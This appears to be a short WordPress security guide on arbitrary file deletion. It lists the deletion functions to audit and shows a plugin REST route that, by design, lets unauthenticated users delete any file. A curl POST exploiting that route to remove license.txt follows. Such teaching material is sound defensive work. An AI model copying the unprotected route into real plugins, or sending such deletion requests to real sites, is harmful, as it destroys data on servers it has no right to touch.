Arbitrary File Deletion

Introduction

This article covers cases of possible Arbitrary File Deletion on WordPress. This includes improper file or directory deletion handling inside of the plugin/theme which can be used to delete arbitrary local files and directories inside of the server.

Useful Functions

Several functions could be useful to identify a possible Arbitrary File Deletion vulnerability:

• PHP related

  • unlink
  • rmdir

• WordPress related

  • wp_delete_file
  • wp_delete_file_from_directory
  • WP_Filesystem_Direct::delete
  • WP_Filesystem_Direct::rmdir

Example Cases

Below is an example of vulnerable code:

add_action("init", "rest_init_setup");

function rest_init_setup(){
    register_rest_route( "myplugin/v1", '/deletemedia/', array(
        'methods'                   =>  "POST",
        'callback'                  =>  'delete_media_upload',
        'permission_callback' => '__return_true',
    ) );
}

function delete_media_upload($request){
    $args = json_decode($request->get_body(),true);
    $data = array('status'=>false);
    if(!empty($args['media']) ){
        wp_delete_file( $args['media']['file'] );
        $data = array('status'=>true);
    }
    return new WP_REST_Response( $data, 200 );
}

To exploit this, any unauthenticated user just needs to perform a POST request to the /wp-json/myplugin/v1/deletemedia endpoint specifying the needed parameter to trigger the wp_delete_file function.

curl <WORDPRESS_BASE_URL>/wp-json/myplugin/v1/deletemedia -d '{"media":{"file":"<WORDPRESS_BASE_DIRECTORY>/license.txt"}}' -H 'Content-Type: application/json'